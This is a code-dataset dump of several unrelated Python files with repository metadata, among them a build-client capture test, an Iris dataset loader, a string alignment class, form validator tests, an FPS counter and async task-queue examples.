b60ef291cf0091e55fe384f99b9ffc4eb76852f2 | 4,035 | py | Python | tests/cli/test_capture.py | lkolacek/osbs-client | 90c6db9a414214c681c777468079bcbe7dd7c809 | [
"BSD-3-Clause"
] | 4 | 2020-05-16T22:30:32.000Z | 2021-11-09T22:26:38.000Z | tests/cli/test_capture.py | lkolacek/osbs-client | 90c6db9a414214c681c777468079bcbe7dd7c809 | [
"BSD-3-Clause"
] | 183 | 2019-06-06T09:10:24.000Z | 2022-03-30T12:05:15.000Z | tests/cli/test_capture.py | lkolacek/osbs-client | 90c6db9a414214c681c777468079bcbe7dd7c809 | [
"BSD-3-Clause"
] | 10 | 2019-10-29T21:55:03.000Z | 2021-01-18T14:20:34.000Z | """
Copyright (c) 2015, 2019 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import absolute_import
import json
import os
import responses
import yaml
from tempfile import NamedTemporaryFile
from textwrap import dedent
from osbs.cli.capture import setup_json_capture
from osbs.tekton import PipelineRun
from osbs.conf import Configuration
from osbs.api import OSBS
from tests.constants import TEST_PIPELINE_RUN_TEMPLATE, TEST_OCP_NAMESPACE
PIPELINE_RUN_NAME = 'source-container-x-x-default'
OPENSHIFT_URL = 'https://openshift.testing'
PIPELINE_RUN_URL = f'{OPENSHIFT_URL}/apis/tekton.dev/v1beta1/namespaces/{TEST_OCP_NAMESPACE}/pipelineruns/{PIPELINE_RUN_NAME}'  # noqa E501
PIPELINE_WATCH_URL = f'{OPENSHIFT_URL}/apis/tekton.dev/v1beta1/watch/namespaces/{TEST_OCP_NAMESPACE}/pipelineruns/{PIPELINE_RUN_NAME}/'  # noqa E501
TASK_RUN_NAME = 'test-task-run-1'
POD_NAME = 'test-pod'
PIPELINE_RUN_JSON = {"metadata": {"name": "name"},
"status": {"conditions": [{"reason": "Running", "status": "Unknown"}]}}
PIPELINE_RUN_WATCH_JSON = {"type": "ADDED", "object": PIPELINE_RUN_JSON}
with open(TEST_PIPELINE_RUN_TEMPLATE) as f:
yaml_data = f.read()
PIPELINE_RUN_DATA = yaml.safe_load(yaml_data)
def osbs_for_capture(tmpdir):
kwargs = {'build_json_dir': 'inputs', 'openshift_url': OPENSHIFT_URL,
'namespace': TEST_OCP_NAMESPACE}
with NamedTemporaryFile(mode="wt") as fp:
config = dedent("""\
[general]
build_json_dir = {build_json_dir}
[default]
openshift_url = {openshift_url}
use_auth = false
namespace = {namespace}
""")
fp.write(config.format(**kwargs))
fp.flush()
dummy_config = Configuration(fp.name, conf_section='default')
osbs = OSBS(dummy_config)
setup_json_capture(osbs, osbs.os_conf, str(tmpdir))
return osbs
def pipeline_run(osbs_for_capture):
return PipelineRun(os=osbs_for_capture.os, pipeline_run_name=PIPELINE_RUN_NAME,
pipeline_run_data=PIPELINE_RUN_DATA)
@responses.activate
def test_json_capture_no_watch(tmpdir):
osbs = osbs_for_capture(tmpdir)
prun = pipeline_run(osbs)
for visit in ["000", "001"]:
responses.add(responses.GET, PIPELINE_RUN_URL, json=PIPELINE_RUN_JSON)
prun.get_info()
filename = "get-tekton.dev_v1beta1_namespaces_{n}_pipelineruns_{p}-{v}.json"
path = os.path.join(str(tmpdir), filename.format(n=TEST_OCP_NAMESPACE,
v=visit, p=PIPELINE_RUN_NAME))
assert os.access(path, os.R_OK)
with open(path) as fp:
obj = json.load(fp)
assert obj
@responses.activate
def test_json_capture_watch(tmpdir):
osbs = osbs_for_capture(tmpdir)
prun = pipeline_run(osbs)
responses.add(
responses.GET,
PIPELINE_WATCH_URL,
json=PIPELINE_RUN_WATCH_JSON,
)
responses.add(responses.GET, PIPELINE_RUN_URL, json=PIPELINE_RUN_JSON)
prun.wait_for_start()
watch_filename = "get-tekton.dev_v1beta1_watch_namespaces_{n}_pipelineruns_{p}_-000-000.json"
get_filename = "get-tekton.dev_v1beta1_namespaces_{n}_pipelineruns_{p}-000.json"
watch_path = os.path.join(str(tmpdir), watch_filename.format(n=TEST_OCP_NAMESPACE,
p=PIPELINE_RUN_NAME))
get_path = os.path.join(str(tmpdir), get_filename.format(n=TEST_OCP_NAMESPACE,
p=PIPELINE_RUN_NAME))
for path in (watch_path, get_path):
assert os.access(path, os.R_OK)
with open(path) as fp:
obj = json.load(fp)
assert obj
| 35.086957 | 157 | 0.680297 | 527 | 4,035 | 4.916509 | 0.259962 | 0.114628 | 0.052103 | 0.040139 | 0.450405 | 0.396372 | 0.33076 | 0.33076 | 0.33076 | 0.264377 | 0 | 0.014223 | 0.215861 | 4,035 | 114 | 158 | 35.394737 | 0.804678 | 0.051053 | 0 | 0.219512 | 0 | 0.02439 | 0.251113 | 0.086934 | 0 | 0 | 0 | 0 | 0.04878 | 1 | 0.04878 | false | 0 | 0.146341 | 0.012195 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b60f51942494a012c87412de5d38d61489e17976 | 2,162 | py | Python | ludwig/datasets/iris/__init__.py | dantreiman/ludwig | daeffd21f9eef524afb2037763abd07a93228c2a | [
"Apache-2.0"
] | 7,739 | 2019-02-11T14:06:31.000Z | 2020-12-16T18:30:29.000Z | ludwig/datasets/iris/__init__.py | dantreiman/ludwig | daeffd21f9eef524afb2037763abd07a93228c2a | [
"Apache-2.0"
] | 769 | 2019-02-11T16:13:20.000Z | 2020-12-16T17:26:11.000Z | ludwig/datasets/iris/__init__.py | dantreiman/ludwig | daeffd21f9eef524afb2037763abd07a93228c2a | [
"Apache-2.0"
] | 975 | 2019-02-11T15:55:54.000Z | 2020-12-14T21:45:39.000Z | #! /usr/bin/env python
# Copyright (c) 2022 Predibase, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import pandas as pd
from ludwig.datasets.base_dataset import BaseDataset, DEFAULT_CACHE_LOCATION
from ludwig.datasets.mixins.download import UncompressedFileDownloadMixin
from ludwig.datasets.mixins.load import CSVLoadMixin
from ludwig.datasets.registry import register_dataset
from ludwig.utils.fs_utils import makedirs
def load(cache_dir=DEFAULT_CACHE_LOCATION, split=False):
if split:
raise ValueError("Iris dataset does not contain a split column")
dataset = Iris(cache_dir=cache_dir)
return dataset.load(split=split)
@register_dataset(name="iris")
class Iris(UncompressedFileDownloadMixin, CSVLoadMixin, BaseDataset):
"""The Iris dataset.
Additional Details:
https://archive.ics.uci.edu/ml/datasets/Iris
"""
def __init__(self, cache_dir=DEFAULT_CACHE_LOCATION):
super().__init__(dataset_name="iris", cache_dir=cache_dir)
def process_downloaded_dataset(self):
raw_df = pd.read_csv(os.path.join(self.raw_dataset_path, self.data_filename))
columns = [
"sepal_length_cm",
"sepal_width_cm",
"petal_length_cm",
"petal_width_cm",
"class",
]
raw_df.columns = columns
makedirs(self.processed_dataset_path, exist_ok=True)
raw_df.to_csv(os.path.join(self.processed_dataset_path, self.csv_filename), index=False)
@property
def data_filename(self):
return self.config["data_filename"]
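# Example (illustrative; the raw data is downloaded on first use, which needs
# network access):
#   from ludwig.datasets import iris
#   df = iris.load()       # returns the processed dataset as a DataFrame
#   iris.load(split=True)  # raises ValueError: no split column exists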
| 34.31746 | 96 | 0.702128 | 282 | 2,162 | 5.202128 | 0.492908 | 0.0409 | 0.04908 | 0.021813 | 0.088616 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004499 | 0.177613 | 2,162 | 62 | 97 | 34.870968 | 0.820585 | 0.343201 | 0 | 0 | 0 | 0 | 0.092286 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.225806 | 0.032258 | 0.451613 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b614594c792bcc71148ae6b00e42b3819d01bc79 | 6,582 | py | Python | src/dtpattern/alignment/alignment_cls.py | jumbrich/dtpattern | 38433c89d169a280b0439b9cd4f463d5d7604dd7 | [
"MIT"
] | null | null | null | src/dtpattern/alignment/alignment_cls.py | jumbrich/dtpattern | 38433c89d169a280b0439b9cd4f463d5d7604dd7 | [
"MIT"
] | 2 | 2018-04-25T22:13:34.000Z | 2018-04-26T17:52:43.000Z | src/dtpattern/alignment/alignment_cls.py | jumbrich/dtpattern | 38433c89d169a280b0439b9cd4f463d5d7604dd7 | [
"MIT"
] | null | null | null | import functools
from dtpattern.alignment.alignment_list import align_global, finalize, format_alignment2
from dtpattern.unicode_translate.uc_models import FIX_SYMB
from pyjuhelpers.timer import timer
class Alignment(object):
def __init__(self, alpha, beta, translate=None, m=6, mm=-4, om=3, csetm=4,go=-10, ge=-5):
self.alpha=alpha
self.beta=beta
self.data={}
self.m=m
self.mm=mm
self.om=om
self.go=go
self.csetm=csetm
self.ge=ge
self.translate = translate
self.find_best_alignment(alpha.symbol, beta.symbol)
def best(self):
return self.data['best'] if 'best' in self.data else None
@timer(key='best_align')
def find_best_alignment(self, alpha_list, beta_list):
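        # Strategy: align the raw symbol lists first; on a partial match,
        # translate the unmatched characters to their character-class symbols
        # and realign ('partl1'/'l1'), then keep the best-scoring alignment.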
score_matrix={
'match':self.m,
'csetmatch':self.csetm,
'optional_match':self.om,
'mismatch': self.mm,
'gapopen':self.go,
'gapextend':self.ge
}
aligns = align_global(alpha_list, beta_list, self.translate, **score_matrix)
identity, score, align1, symbol2, align2 = finalize(*aligns[0], translate=self.translate)
self.data['raw']={ 'score':score, 'identity':identity,
'align1':align1,'align2':align2, 'symbol':symbol2
}
        if 0 < identity < 100:
            # identity strictly between 0 and 100 means some characters matched
            # translate the non-matching symbols in alpha
ctrans = False
alpha_ct=[]
for sym in symbol2:
if isinstance(sym, str):
                    # a str in the alignment means a match
alpha_ct.append(sym)
elif isinstance(sym, list):
                    # a list marks an alignment of two different characters/symbols
if sym[0] != '':
if isinstance(sym[0],str):
ctrans = True
alpha_ct.append( FIX_SYMB( self.translate(sym[0]), 1) )
else:
alpha_ct.append( sym[0] )
if ctrans:
score_matrix = {
'match': self.m,
                    'csetmatch': self.m,  # score cset matches as full matches, since non-matching characters were translated to symbols
'optional_match': self.om,
'mismatch': self.mm,
'gapopen': self.go,
'gapextend': self.ge
}
aligns = align_global(alpha_ct, beta_list,self.translate, **score_matrix)
identity, score, align1, symbol2, align2 = finalize(*aligns[0], translate=self.translate)
self.data['partl1'] = {
'score': score, 'identity': identity,
'align1': align1, 'align2': align2,
'symbol': symbol2
}
elif identity == 0:
#no matching characters:
alpha_ct = []
ctrans = False
for sym in alpha_list:
if isinstance(sym, str):
ctrans = True
alpha_ct.append( FIX_SYMB( self.translate(sym), 1) )
else:
alpha_ct.append( sym )
if ctrans:
score_matrix = {
'match': self.m,
'csetmatch': self.m, # uc match counts full
'optional_match': self.om,
'mismatch': self.mm,
'gapopen': self.go,
'gapextend': self.ge
}
aligns = align_global(alpha_ct, beta_list, self.translate,**score_matrix)
identity, score, align1, symbol2, align2 = finalize(*aligns[0], translate=self.translate)
self.data['l1'] = {
'score': score, 'identity': identity,
'align1': align1, 'align2': align2,
'symbol': symbol2
}
if len(self.data) > 1:
def compare(item1, item2):
#identity before score
res = item1[1]['identity'] - item2[1]['identity']
if res == 0:
res = item1[1]['score'] - item2[1]['score']
return res
_s_al = sorted(enumerate(list(self.data.values())), key=functools.cmp_to_key(compare))
self.data['best'] = _s_al[-1][1]
else:
self.data['best'] = self.data['raw']
def __repr__(self):
s = "--ALIGNMENT: {} - {} --".format(repr(self.alpha), repr(self.beta))
s += "\n costs: m:{} mm:{} go:{} ge:{}".format(self.m,self.mm,self.go,self.ge)
for key, v in self.data.items():
identity, score, align1, symbol, align2= v['identity'],v['score'],v['align1'],v['symbol'],v['align2']
s+="\n {}\n{}".format(key,format_alignment2(identity, score, align1, symbol, align2, indent=2, translate=self.translate))
return s
def __str__(self):
s="--ALIGNMENT({},{},{},{}): {} - {} --".format(self.m,self.mm,self.go,self.ge,self.alpha, self.beta)
for key, v in self.data.items():
identity, score, align1, symbol, align2= v['identity'],v['score'],v['align1'],v['symbol'],v['align2']
s+=" \n[{:^8}] ident: {:6.2f} score: {:>3} SYM: {}".format(key, identity, score, symbol)
return s
def compare(item1, item2):
"""
compares first identity and if equals the score
:param item1:
:param item2:
:return:
"""
data1, data2 = item1[1], item2[1]
if data1 is None and data2 is None:
return 0
elif data1 is None and data2 is not None:
return -1
elif data1 is not None and data2 is None:
return +1
else:
res = data1.data['best']['identity'] - data2.data['best']['identity']
if res == 0:
res = data1.data['best']['score'] - data2.data['best']['score']
return res
| 37.186441 | 133 | 0.499696 | 734 | 6,582 | 4.393733 | 0.185286 | 0.032248 | 0.032248 | 0.018605 | 0.459535 | 0.43938 | 0.396589 | 0.386047 | 0.386047 | 0.368062 | 0 | 0.029199 | 0.370404 | 6,582 | 176 | 134 | 37.397727 | 0.749035 | 0.118201 | 0 | 0.475806 | 0 | 0 | 0.098107 | 0.004341 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056452 | false | 0 | 0.032258 | 0.008065 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3733a08138ec283d797445a7d27a5b19edaeec7d | 6,056 | py | Python | tests/test_validators.py | jpsca/pforms | 77c9da93e5224e79bb147aa873f28951e972bb21 | [
"MIT"
] | 2 | 2020-09-30T22:41:00.000Z | 2020-12-04T16:47:17.000Z | tests/test_validators.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | 2 | 2021-11-18T18:01:28.000Z | 2021-11-18T18:03:29.000Z | tests/test_validators.py | jpsca/hyperform | d5c450ad8684a853fed26f8c2606877151125a9e | [
"MIT"
] | null | null | null | from datetime import date, datetime
import pytest
from proper_forms import Date, DateTime, Field, Integer
from proper_forms import validators as v
def test_confirmed_message():
validator = v.Confirmed()
assert validator.message == "Values doesn't match."
assert v.Confirmed(message="custom").message == "custom"
def test_longer_than_message():
validator = v.LongerThan(5)
assert validator.message == "Field must be at least 5 character long."
assert v.LongerThan(5, message="custom").message == "custom"
def test_shorter_than_message():
validator = v.ShorterThan(5)
assert validator.message == "Field cannot be longer than 5 characters."
assert v.ShorterThan(5, message="custom").message == "custom"
def test_less_than_message():
validator = v.LessThan(10)
assert validator.message == "Number must be less than 10."
assert v.LessThan(10, message="custom").message == "custom"
def test_more_than_message():
validator = v.MoreThan(10)
assert validator.message == "Number must be greater than 10."
assert v.MoreThan(10, message="custom").message == "custom"
def test_in_range_message():
validator = v.InRange(1900, 2010)
assert validator.message == "Number must be between 1900 and 2010."
assert v.InRange(1900, 2010, message="custom").message == "custom"
def test_before_message():
dt = datetime(2017, 7, 5)
validator = v.Before(dt)
assert validator.message == "Enter a valid date before 2017-07-05."
assert v.Before(dt, message="custom").message == "custom"
def test_after_message():
dt = datetime(2017, 7, 5)
validator = v.After(dt)
assert validator.message == "Enter a valid date after 2017-07-05."
assert v.After(dt, message="custom").message == "custom"
def test_before_now_message():
validator = v.BeforeNow()
assert validator.message == "Enter a valid date in the past."
assert v.BeforeNow(message="custom").message == "custom"
def test_after_now_message():
validator = v.AfterNow()
assert validator.message == "Enter a valid date in the future."
assert v.AfterNow(message="custom").message == "custom"
DATA = [
[Field, v.Confirmed(), ["password", "password"], True],
[Field, v.Confirmed(), ["password", "password", "password"], True],
[Field, v.Confirmed(), ["password"], False],
[Field, v.Confirmed(), ["lorem", "ipsum"], False],
[Field, v.Confirmed(), ["password", "nope", "password"], False],
[Field, v.LongerThan(5), ["123456789"], True],
[Field, v.LongerThan(5), ["12345"], True],
[Field, v.LongerThan(5), ["abc"], False],
[Field, v.LongerThan(5), ["123456789", "qwertyuiop", "lorem ipsum"], True],
[Field, v.LongerThan(5), ["123456789", "abc", "lorem ipsum"], False],
[Field, v.ShorterThan(5), ["123"], True],
[Field, v.ShorterThan(5), ["12345"], True],
[Field, v.ShorterThan(5), ["qwertyuiop"], False],
[Field, v.ShorterThan(5), ["1234", "abc", "lorem"], True],
[Field, v.ShorterThan(5), ["1234", "abcdefghijk", "lorem"], False],
[Integer, v.LessThan(10), ["8"], True],
[Integer, v.LessThan(10), ["10"], True],
[Integer, v.LessThan(10), ["34"], False],
[Integer, v.LessThan(10), ["4", "3", "5"], True],
[Integer, v.LessThan(10), ["4", "3", "25"], False],
[Integer, v.MoreThan(10), ["20"], True],
[Integer, v.MoreThan(10), ["-1"], False],
[Integer, v.MoreThan(10), ["20", "13", "25"], True],
[Integer, v.MoreThan(10), ["8", "13", "25"], False],
[Integer, v.InRange(1900, 2010), ["1979"], True],
[Integer, v.InRange(1900, 2010), ["1900"], True],
[Integer, v.InRange(1900, 2010), ["2010"], True],
[Integer, v.InRange(1900, 2010), ["1820"], False],
[Integer, v.InRange(1900, 2010), ["3000"], False],
[Integer, v.InRange(1900, 2010), ["-1"], False],
[Integer, v.InRange(1900, 2010), ["1979", "1984", "2009"], True],
[Integer, v.InRange(1900, 2010), ["1979", "1984", "2019"], False],
[Date, v.Before(datetime(2017, 7, 5)), ["1979-05-05"], True],
[Date, v.Before(datetime(2017, 7, 5)), ["2019-07-16"], False],
[Date, v.Before(date(2017, 7, 5)), ["1979-05-05"], True],
[Date, v.Before(date(2017, 7, 5)), ["2019-07-16"], False],
[Date, v.After(datetime(2017, 7, 5)), ["2019-07-16"], True],
[Date, v.After(datetime(2017, 7, 5)), ["1979-05-05"], False],
[Date, v.After(date(2017, 7, 5)), ["2019-07-16"], True],
[Date, v.After(date(2017, 7, 5)), ["1979-05-05"], False],
[Date, v.BeforeNow(), ["1821-07-28"], True],
[Date, v.BeforeNow(), ["3000-01-01"], False],
[Date, v.AfterNow(), ["3000-01-01"], True],
[Date, v.AfterNow(), ["1821-07-28"], False],
[DateTime, v.Before(datetime(2017, 7, 5)), ["1979-05-05"], True],
[DateTime, v.Before(datetime(2017, 7, 5)), ["2019-07-16"], False],
[DateTime, v.Before(date(2017, 7, 5)), ["1979-05-05"], True],
[DateTime, v.Before(date(2017, 7, 5)), ["2019-07-16"], False],
[DateTime, v.After(datetime(2017, 7, 5)), ["2019-07-16"], True],
[DateTime, v.After(datetime(2017, 7, 5)), ["1979-05-05"], False],
[DateTime, v.After(date(2017, 7, 5)), ["2019-07-16"], True],
[DateTime, v.After(date(2017, 7, 5)), ["1979-05-05"], False],
[DateTime, v.BeforeNow(), ["1821-07-28"], True],
[DateTime, v.BeforeNow(), ["3000-01-01"], False],
[DateTime, v.AfterNow(), ["3000-01-01"], True],
[DateTime, v.AfterNow(), ["1821-07-28"], False],
]
@pytest.mark.parametrize("FieldClass, validator, input_values, result", DATA)
def test_validators(FieldClass, validator, input_values, result):
field = FieldClass(validator)
field.input_values = input_values
assert bool(field.validate()) is result
DATE_VALIDATORS = [
v.Before(datetime(2017, 7, 5)),
v.After(datetime(2017, 7, 5)),
v.BeforeNow(),
v.AfterNow(),
]
@pytest.mark.parametrize("validator", DATE_VALIDATORS)
def test_fail_if_not_date(validator):
field = Integer(validator)
field.input_values = ["1979"]
with pytest.raises(AssertionError):
field.validate()
| 39.842105 | 79 | 0.62467 | 824 | 6,056 | 4.541262 | 0.137136 | 0.069482 | 0.032068 | 0.044896 | 0.665152 | 0.524319 | 0.370657 | 0.219669 | 0.181187 | 0.145377 | 0 | 0.115544 | 0.16397 | 6,056 | 151 | 80 | 40.10596 | 0.623543 | 0 | 0 | 0.016529 | 0 | 0 | 0.168758 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.099174 | false | 0.033058 | 0.033058 | 0 | 0.132231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3734bdeaee2424fb8a41b0e01dff10a01e85aac8 | 2,084 | py | Python | detection_viz/scripts/fps_calculator.py | Benson516/detection_viz_ROS | 7eb0c3edee9f402ab6fe2d8d4050cd4a67eabf6b | [
"MIT"
] | null | null | null | detection_viz/scripts/fps_calculator.py | Benson516/detection_viz_ROS | 7eb0c3edee9f402ab6fe2d8d4050cd4a67eabf6b | [
"MIT"
] | null | null | null | detection_viz/scripts/fps_calculator.py | Benson516/detection_viz_ROS | 7eb0c3edee9f402ab6fe2d8d4050cd4a67eabf6b | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
import rospy
import numpy as np
import threading
from timeit import default_timer as timer
import time
class FPS:
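    # Sliding-window FPS estimator: a timer thread samples the cumulative step
    # count every `period_update` seconds into a circular buffer, so the rate is
    # (steps gained over the window) / (period_update * window_size seconds).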
def __init__(self):
self.period_update = 0.2 # sec.
self.window_size = 25 # samples
self.max_cumulated_step = 100000
#
self.buffer_cumulated_stamp = [0 for _ in range(self.window_size)]
self.idx_now = self.correct_index(0)
#
self.cumulated_step = self.correct_step(0)
#
self.period_window = self.period_update * self.window_size
self.fps = 0.0
#------------------------#
self.stamp_start = timer()
self.stamp_last = self.stamp_start
_t = threading.Timer(self.period_update, self._worker)
_t.daemon = True
_t.start()
    def step(self):
        """Advance the frame counter by one; call once per processed frame."""
        self.cumulated_step = self.correct_step(self.cumulated_step + 1)
    def correct_index(self, index_in):
        """Wrap an index into the circular buffer range."""
        return int(index_in % self.window_size)
    def correct_step(self, step_in):
        """Wrap a cumulative step count so it never grows without bound."""
        return int(step_in % self.max_cumulated_step)
def _worker(self):
stamp_now = timer()
_t = threading.Timer(self.period_update, self._worker)
_t.daemon = True
_t.start()
# Pop out old one
step_pre = self.buffer_cumulated_stamp[self.idx_now]
# Push new one
self.buffer_cumulated_stamp[self.idx_now] = self.cumulated_step
# Calculate the difference
_step_diff = self.buffer_cumulated_stamp[self.idx_now] - step_pre
_step_diff = self.correct_step(_step_diff)
# Calculate FPS
self.fps = _step_diff / float(self.period_window)
# next step
self.idx_now = self.correct_index(self.idx_now + 1)
# print("fps = %f" % self.fps)
_delta_T = stamp_now - self.stamp_last
self.stamp_last = stamp_now
# print("Hey %s sec." % str(_delta_T))
if __name__ == "__main__":
fps = FPS()
while True:
fps.step()
time.sleep(0.3)
| 26.717949 | 74 | 0.596929 | 268 | 2,084 | 4.313433 | 0.283582 | 0.051903 | 0.051903 | 0.083045 | 0.32699 | 0.288927 | 0.188581 | 0.100346 | 0.100346 | 0.100346 | 0 | 0.013541 | 0.291267 | 2,084 | 77 | 75 | 27.064935 | 0.769127 | 0.096929 | 0 | 0.136364 | 0 | 0 | 0.004391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.113636 | 0 | 0.295455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3735790497e156cdee39aed5c0df2ddf1799e05b | 2,966 | py | Python | examples/main.py | levsh/arrlio | c6819bbe697ebcfbeafdd04af07f26f24b33d670 | [
"MIT"
] | null | null | null | examples/main.py | levsh/arrlio | c6819bbe697ebcfbeafdd04af07f26f24b33d670 | [
"MIT"
] | null | null | null | examples/main.py | levsh/arrlio | c6819bbe697ebcfbeafdd04af07f26f24b33d670 | [
"MIT"
] | null | null | null | import asyncio
import logging
import arrlio
import tasks
from arrlio import crypto
from arrlio.serializer.json import CryptoJson
logger = logging.getLogger("arrlio")
logger.setLevel("INFO")
BACKEND = "arrlio.backend.local"
async def main():
async def example_1():
producer = arrlio.Producer(arrlio.ProducerConfig(backend=BACKEND))
consumer = arrlio.Consumer(arrlio.ConsumerConfig(backend=BACKEND))
async with producer, consumer:
await consumer.consume_tasks()
# call by task
ar = await producer.send_task(tasks.hello_world)
logger.info(await ar.get())
# call by task name
ar = await producer.send_task("foo")
logger.info(await ar.get())
# task bind example
ar = await producer.send_task(tasks.bind)
logger.info(await ar.get())
# exception
try:
ar = await producer.send_task(tasks.exception)
logger.info(await ar.get())
except Exception as e:
print(f"\nThis is example exception for {producer.backend}:\n")
logger.exception(e)
print()
async def example_2():
pri_key = crypto.generate_private_key()
pub_key = pri_key.public_key()
def serializer():
return CryptoJson(
encryptor=lambda x: crypto.a_encrypt(x, pub_key),
decryptor=lambda x: crypto.a_decrypt(x, pri_key),
)
backend_config_kwds = {"serializer": serializer}
consumer = arrlio.Consumer(
arrlio.ConsumerConfig(backend=BACKEND),
backend_config_kwds=backend_config_kwds,
)
producer = arrlio.Producer(
arrlio.ProducerConfig(backend=BACKEND),
backend_config_kwds=backend_config_kwds,
)
async with producer, consumer:
await consumer.consume_tasks()
ar = await producer.send_task(tasks.hello_world, encrypt=True, result_encrypt=True)
logger.info(await ar.get())
async def example_3():
graph = arrlio.Graph("My Graph")
graph.add_node("A", tasks.add_one, root=True)
graph.add_node("B", tasks.add_one)
graph.add_node("C", tasks.add_one)
graph.add_edge("A", "B")
graph.add_edge("B", "C")
producer = arrlio.Producer(arrlio.ProducerConfig(backend=BACKEND))
consumer = arrlio.Consumer(arrlio.ConsumerConfig(backend=BACKEND))
async with producer, consumer:
await consumer.consume_tasks()
ars = await producer.send_graph(graph, args=(0,))
logger.info("A: %i", await ars["A"].get())
logger.info("B: %i", await ars["B"].get())
logger.info("C: %i", await ars["C"].get())
await example_1()
await example_2()
await example_3()
if __name__ == "__main__":
asyncio.run(main())
| 30.265306 | 95 | 0.599798 | 342 | 2,966 | 5.04386 | 0.248538 | 0.064928 | 0.05913 | 0.055072 | 0.491014 | 0.397681 | 0.365217 | 0.316522 | 0.187826 | 0.187826 | 0 | 0.003322 | 0.289616 | 2,966 | 97 | 96 | 30.57732 | 0.815377 | 0.019555 | 0 | 0.246377 | 0 | 0 | 0.047193 | 0.007234 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014493 | false | 0 | 0.086957 | 0.014493 | 0.115942 | 0.028986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37369717bf4744bf752a9e5e1db557ed280d3c7a | 496 | py | Python | Blatt-02/Sonstiges/tribonacci.py | MartinThoma/prog-ws1213 | c82a2fb81bac774f8d3214a25c33124a9f512ef0 | [
"MIT"
] | 1 | 2017-08-10T13:12:03.000Z | 2017-08-10T13:12:03.000Z | Blatt-02/Sonstiges/tribonacci.py | siviaseason/prog-ws1213 | c82a2fb81bac774f8d3214a25c33124a9f512ef0 | [
"MIT"
] | null | null | null | Blatt-02/Sonstiges/tribonacci.py | siviaseason/prog-ws1213 | c82a2fb81bac774f8d3214a25c33124a9f512ef0 | [
"MIT"
] | 2 | 2016-06-08T20:56:04.000Z | 2022-03-11T20:12:37.000Z | def tribonacci(n):
if n < 3:
return n
else:
return tribonacci(n-1) + tribonacci(n-2) + tribonacci(n-3)
def tribonacciBottomUp(n):
last = 1
secondLast = 1
thirdLast = 1
for i in range(2,n):
new = last + secondLast + thirdLast
thirdLast = secondLast
secondLast = last
last = new
return last
def fillIt(n):
    # Print an HTML table row for each Tribonacci number up to n.
    for i in range(0, n + 1):
        print("<tr><td>%i</td><td>%i</td></tr>" % (i, tribonacciBottomUp(i)))
| 21.565217 | 73 | 0.568548 | 69 | 496 | 4.086957 | 0.376812 | 0.156028 | 0.042553 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034286 | 0.294355 | 496 | 22 | 74 | 22.545455 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0.0625 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0 | 0 | 0.315789 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37379882a0e02a3d332d5d8f259eede951ecb249 | 1,805 | py | Python | flake8_pie/tests/test_pie803_prefer_logging_interpolation.py | sbdchd/flake8-pie | 96ae441d92abe64b23e1c37b0eb15778434000cc | [
"BSD-2-Clause"
